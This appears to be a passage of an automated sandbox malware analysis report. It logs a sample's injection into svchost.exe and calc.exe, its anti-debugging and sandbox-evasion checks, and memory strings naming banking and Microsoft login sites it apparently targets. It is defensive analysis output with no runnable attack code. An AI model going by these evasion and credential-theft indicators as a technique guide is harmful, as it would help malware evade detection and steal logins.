Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: uDeZXYtzetmc.exe, 00000004.00000002.3336948822.00000000008DE000.00000002.00000001.01000000.00000005.sdmp, uDeZXYtzetmc.exe, 00000008.00000000.1966710715.00000000008DE000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: bkTW1FbgHN.exe, 00000000.00000003.1482829369.00000000043E0000.00000004.00001000.00020000.00000000.sdmp, bkTW1FbgHN.exe, 00000000.00000003.1483532312.0000000004240000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1789676355.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1887756736.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1887756736.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1787802643.0000000003600000.00000004.00000020.00020000.00000000.sdmp, calc.exe, 00000005.00000002.3338202134.0000000005060000.00000040.00001000.00020000.00000000.sdmp, calc.exe, 00000005.00000003.1892770553.0000000004D00000.00000004.00000020.00020000.00000000.sdmp, calc.exe, 00000005.00000002.3338202134.00000000051FE000.00000040.00001000.00020000.00000000.sdmp, calc.exe, 00000005.00000003.1895123628.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: calc.pdb source: svchost.exe, 00000002.00000003.1855097265.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1855699365.000000000342B000.00000004.00000020.00020000.00000000.sdmp, uDeZXYtzetmc.exe, 00000004.00000002.3336433615.0000000000730000.00000004.00000020.00020000.00000000.sdmp, uDeZXYtzetmc.exe, 00000004.00000002.3336433615.0000000000718000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: bkTW1FbgHN.exe, 00000000.00000003.1482829369.00000000043E0000.00000004.00001000.00020000.00000000.sdmp, bkTW1FbgHN.exe, 00000000.00000003.1483532312.0000000004240000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1789676355.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1887756736.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1887756736.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1787802643.0000000003600000.00000004.00000020.00020000.00000000.sdmp, calc.exe, 00000005.00000002.3338202134.0000000005060000.00000040.00001000.00020000.00000000.sdmp, calc.exe, 00000005.00000003.1892770553.0000000004D00000.00000004.00000020.00020000.00000000.sdmp, calc.exe, 00000005.00000002.3338202134.00000000051FE000.00000040.00001000.00020000.00000000.sdmp, calc.exe, 00000005.00000003.1895123628.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: calc.exe, 00000005.00000002.3338976521.000000000568C000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 00000005.00000002.3336312350.0000000003305000.00000004.00000020.00020000.00000000.sdmp, uDeZXYtzetmc.exe, 00000008.00000000.1966978807.00000000025DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2195895650.00000000373AC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: calc.exe, 00000005.00000002.3338976521.000000000568C000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 00000005.00000002.3336312350.0000000003305000.00000004.00000020.00020000.00000000.sdmp, uDeZXYtzetmc.exe, 00000008.00000000.1966978807.00000000025DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2195895650.00000000373AC000.00000004.80000000.00040000.00000000.sdmp

Source: bkTW1FbgHN.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: bkTW1FbgHN.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: bkTW1FbgHN.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: bkTW1FbgHN.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: bkTW1FbgHN.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe

Code function: 0_2_00F94B37 LoadLibraryA,GetProcAddress,

0_2_00F94B37

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FB8945 push ecx; ret	0_2_00FB8958
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041286D push D80F02F8h; ret	2_2_0041288C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00415027 push 79B78FF1h; retf	2_2_00415035
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00412839 push ss; ret	2_2_004128F5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004128C2 push ss; ret	2_2_004128F5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00414904 push 00000006h; iretd	2_2_0041492A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040D4E9 push cs; ret	2_2_0040D509
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004145C0 pushfd ; ret	2_2_004145A9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040758E push esi; iretd	2_2_0040758F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403590 push eax; ret	2_2_00403592
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004145A8 pushfd ; ret	2_2_004145A9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00404E82 push edx; iretd	2_2_00404EA7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A0225F pushad ; ret	2_2_03A027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A027FA pushad ; ret	2_2_03A027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A309AD push ecx; mov dword ptr [esp], ecx	2_2_03A309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A0283D push eax; iretd	2_2_03A02858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A01366 push eax; iretd	2_2_03A01369

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00F948D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00F948D7
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_01015376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_01015376

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe

Code function: 0_2_00FB3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00FB3187

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	API/Special instruction interceptor: Address: 1BDAD74
Source: C:\Windows\SysWOW64\calc.exe	API/Special instruction interceptor: Address: 7FFBCB7AD324
Source: C:\Windows\SysWOW64\calc.exe	API/Special instruction interceptor: Address: 7FFBCB7AD7E4
Source: C:\Windows\SysWOW64\calc.exe	API/Special instruction interceptor: Address: 7FFBCB7AD944
Source: C:\Windows\SysWOW64\calc.exe	API/Special instruction interceptor: Address: 7FFBCB7AD504
Source: C:\Windows\SysWOW64\calc.exe	API/Special instruction interceptor: Address: 7FFBCB7AD544
Source: C:\Windows\SysWOW64\calc.exe	API/Special instruction interceptor: Address: 7FFBCB7AD1E4
Source: C:\Windows\SysWOW64\calc.exe	API/Special instruction interceptor: Address: 7FFBCB7B0154
Source: C:\Windows\SysWOW64\calc.exe	API/Special instruction interceptor: Address: 7FFBCB7ADA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_03A7096E rdtsc

2_2_03A7096E

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-105676

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	API coverage: 4.4 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %

Source: C:\Windows\SysWOW64\calc.exe TID: 5624	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe TID: 5624	Thread sleep time: -78000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe TID: 344	Thread sleep time: -55000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe TID: 344	Thread sleep time: -34500s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\calc.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\calc.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FF445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00FF445A
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FFC6D1 FindFirstFileW,FindClose,	0_2_00FFC6D1
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FFC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00FFC75C
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FFEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00FFEF95
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FFF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00FFF0F2
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FFF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00FFF3F3
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FF37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00FF37EF
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FF3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00FF3B12
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FFBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00FFBCBC

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe

Code function: 0_2_00F949A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00F949A0

Source: -19f3pMI.5.dr	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: -19f3pMI.5.dr	Binary or memory string: discord.comVMware20,11696494690f
Source: -19f3pMI.5.dr	Binary or memory string: AMC password management pageVMware20,11696494690
Source: -19f3pMI.5.dr	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: -19f3pMI.5.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: -19f3pMI.5.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: -19f3pMI.5.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: -19f3pMI.5.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: -19f3pMI.5.dr	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: -19f3pMI.5.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: -19f3pMI.5.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: -19f3pMI.5.dr	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: calc.exe, 00000005.00000002.3336312350.0000000003305000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
Source: -19f3pMI.5.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: calc.exe, 00000005.00000002.3341110757.000000000825B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,1f
Source: -19f3pMI.5.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: -19f3pMI.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: -19f3pMI.5.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: -19f3pMI.5.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: uDeZXYtzetmc.exe, 00000008.00000002.3337062589.000000000071F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: -19f3pMI.5.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: -19f3pMI.5.dr	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: -19f3pMI.5.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: -19f3pMI.5.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: calc.exe, 00000005.00000002.3341110757.000000000825B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: teractivebrokers.co.inVMware20,11696494690d
Source: -19f3pMI.5.dr	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: -19f3pMI.5.dr	Binary or memory string: global block list test formVMware20,11696494690
Source: calc.exe, 00000005.00000002.3341110757.000000000825B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,1169649469
Source: -19f3pMI.5.dr	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: -19f3pMI.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: -19f3pMI.5.dr	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: -19f3pMI.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: -19f3pMI.5.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: -19f3pMI.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: firefox.exe, 0000000A.00000002.2197558349.000001E93730C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllhhU
Source: calc.exe, 00000005.00000002.3341110757.000000000825B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690#
Source: -19f3pMI.5.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: -19f3pMI.5.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe

API call chain: ExitProcess graph end node

graph_0-104356

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_03A7096E rdtsc

2_2_03A7096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00417DF3 LdrLoadDll,

2_2_00417DF3

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe

Code function: 0_2_01003F09 BlockInput,

0_2_01003F09

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe

Code function: 0_2_00F93B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00F93B3A

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe

Code function: 0_2_00FC5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00FC5A7C

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe

Code function: 0_2_00F94B37 LoadLibraryA,GetProcAddress,

0_2_00F94B37

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_01BDB040 mov eax, dword ptr fs:[00000030h]	0_2_01BDB040
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_01BD99D0 mov eax, dword ptr fs:[00000030h]	0_2_01BD99D0
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_01BDAFE0 mov eax, dword ptr fs:[00000030h]	0_2_01BDAFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h]	2_2_03A2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h]	2_2_03A2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h]	2_2_03A2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5438F mov eax, dword ptr fs:[00000030h]	2_2_03A5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5438F mov eax, dword ptr fs:[00000030h]	2_2_03A5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h]	2_2_03A28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h]	2_2_03A28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h]	2_2_03A28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]	2_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]	2_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]	2_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]	2_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]	2_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]	2_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]	2_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]	2_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]	2_2_03A4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]	2_2_03A4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]	2_2_03A4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A663FF mov eax, dword ptr fs:[00000030h]	2_2_03A663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AEC3CD mov eax, dword ptr fs:[00000030h]	2_2_03AEC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]	2_2_03A383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]	2_2_03A383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]	2_2_03A383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]	2_2_03A383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB63C0 mov eax, dword ptr fs:[00000030h]	2_2_03AB63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADE3DB mov eax, dword ptr fs:[00000030h]	2_2_03ADE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADE3DB mov eax, dword ptr fs:[00000030h]	2_2_03ADE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADE3DB mov ecx, dword ptr fs:[00000030h]	2_2_03ADE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADE3DB mov eax, dword ptr fs:[00000030h]	2_2_03ADE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD43D4 mov eax, dword ptr fs:[00000030h]	2_2_03AD43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD43D4 mov eax, dword ptr fs:[00000030h]	2_2_03AD43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B08324 mov eax, dword ptr fs:[00000030h]	2_2_03B08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B08324 mov ecx, dword ptr fs:[00000030h]	2_2_03B08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B08324 mov eax, dword ptr fs:[00000030h]	2_2_03B08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B08324 mov eax, dword ptr fs:[00000030h]	2_2_03B08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h]	2_2_03A6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h]	2_2_03A6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h]	2_2_03A6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2C310 mov ecx, dword ptr fs:[00000030h]	2_2_03A2C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A50310 mov ecx, dword ptr fs:[00000030h]	2_2_03A50310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD437C mov eax, dword ptr fs:[00000030h]	2_2_03AD437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]	2_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]	2_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]	2_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB035C mov ecx, dword ptr fs:[00000030h]	2_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]	2_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]	2_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFA352 mov eax, dword ptr fs:[00000030h]	2_2_03AFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD8350 mov ecx, dword ptr fs:[00000030h]	2_2_03AD8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B0634F mov eax, dword ptr fs:[00000030h]	2_2_03B0634F
